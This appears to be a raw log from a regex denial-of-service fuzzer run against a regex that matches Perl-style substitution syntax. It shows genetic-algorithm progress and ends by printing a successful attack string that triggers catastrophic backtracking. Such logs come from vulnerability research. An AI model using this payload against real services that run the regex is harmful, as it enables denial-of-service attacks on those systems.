\b(?:s|tr|y)\s+([a-zA-Z0-9])(\\?.)*?\s*\1\s*((?!\1).|\\.)*\s*\1[msixpodualgcer]*
2: <45 : 8.761904761904763 : y
2.*Fhl`BeS~xl`BeSFhl`BeFhl`BeS~x2"K_.*Fhl`BeS~xl`BeSl`BeS~x2><42 : 12.241379310344827 : y
2.*Fhl`BeS~xl`BeSFhl`BeFhFhl`BeFhl`BeFhl`BeFhFhl`BeFhl`BeS~x*Fhl`BeS~xl`BeSFhl`B~x2\>
===Initiate End===
Node Coverage: 46/46
find attack string when cross
===Genetic Algorithm End===
Node Coverage: 46/46
Vulnerable: y
2.*Fhl`BeS~xl`BeShl`BeS~x*Fhl`BeS~xl`BeSFhl`B~x2\80\|?1g11()\)y\4\(\)\)y\4\(\)?c
100085 : 1205.8433734939758 : y
2.*Fhl`BeS~xl`BeShl`BeS~x*Fhl`BeS~xl`BeSFhl`B~x2\80\|?1g11()\)y\4\(\)\)y\4\(\)?c
100034 : 3226.9032258064517 : y
22\80\|?\)y\4\(\)\)y\4\(\)?c
1000045 : y
22\80\|?\)y\4\(\\)y\4\(\)\)y\4\(\)?c
1000340 : 11 : y
22\80\|?\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\)\)y\4\(\)?c
100000328 : y
22\80\|?\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\)\)y\4\(\)?c
TIME: 4.071293482 (s)
Attack success, attack string is:
y
22\80\|?\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\\)y\4\(\)\)y\4\(\)?c
